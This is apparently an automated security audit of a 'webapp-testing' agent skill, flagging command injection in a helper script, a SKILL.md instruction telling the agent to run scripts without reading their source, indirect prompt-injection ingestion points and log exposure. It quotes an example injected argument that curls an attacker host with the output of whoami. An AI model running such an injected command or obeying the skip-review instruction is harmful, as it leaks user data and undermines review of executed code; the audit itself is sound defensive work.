NYC

webapp-testing

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The helper script scripts/with_server.py utilizes subprocess.Popen with shell=True to execute commands passed as command-line arguments.
  • Evidence: Line 86 in scripts/with_server.py: process = subprocess.Popen(server['cmd'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).
  • Risk: This allows for arbitrary shell command injection if the agent or a user provides malicious input to the --server argument (e.g., "npm run dev; curl http://attacker.com/$(whoami)").
  • [PROMPT_INJECTION] (MEDIUM): The SKILL.md documentation contains explicit instructions that discourage the agent from performing its usual safety step of reading source code before execution.
  • Evidence: SKILL.md: "DO NOT read the source until you try running the script first... They exist to be called directly as black-box scripts rather than ingested into your context window."
  • Risk: While framed as context optimization, this instruction prevents the agent from auditing the logic of the with_server.py script or any generated Playwright scripts, making it more susceptible to executing malicious payloads.
  • [INDIRECT_PROMPT_INJECTION] (LOW): The skill is designed to scrape and interact with web content, which is an untrusted ingestion point.
  • Ingestion points: page.content(), button.inner_text(), and browser console logs in examples/element_discovery.py and examples/console_logging.py.
  • Boundary markers: None identified in the provided examples.
  • Capability inventory: Arbitrary command execution via scripts/with_server.py and file writing to /mnt/user-data/.
  • Sanitization: None; the script directly prints and saves content retrieved from the browser.
  • [DATA_EXPOSURE] (LOW): The skill captures browser logs and screenshots and writes them to persistent storage.
  • Evidence: examples/console_logging.py saves data to /mnt/user-data/outputs/console.log.
  • Context: While this is standard for the tool's purpose, console logs often inadvertently contain sensitive session tokens or PII.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:14 PM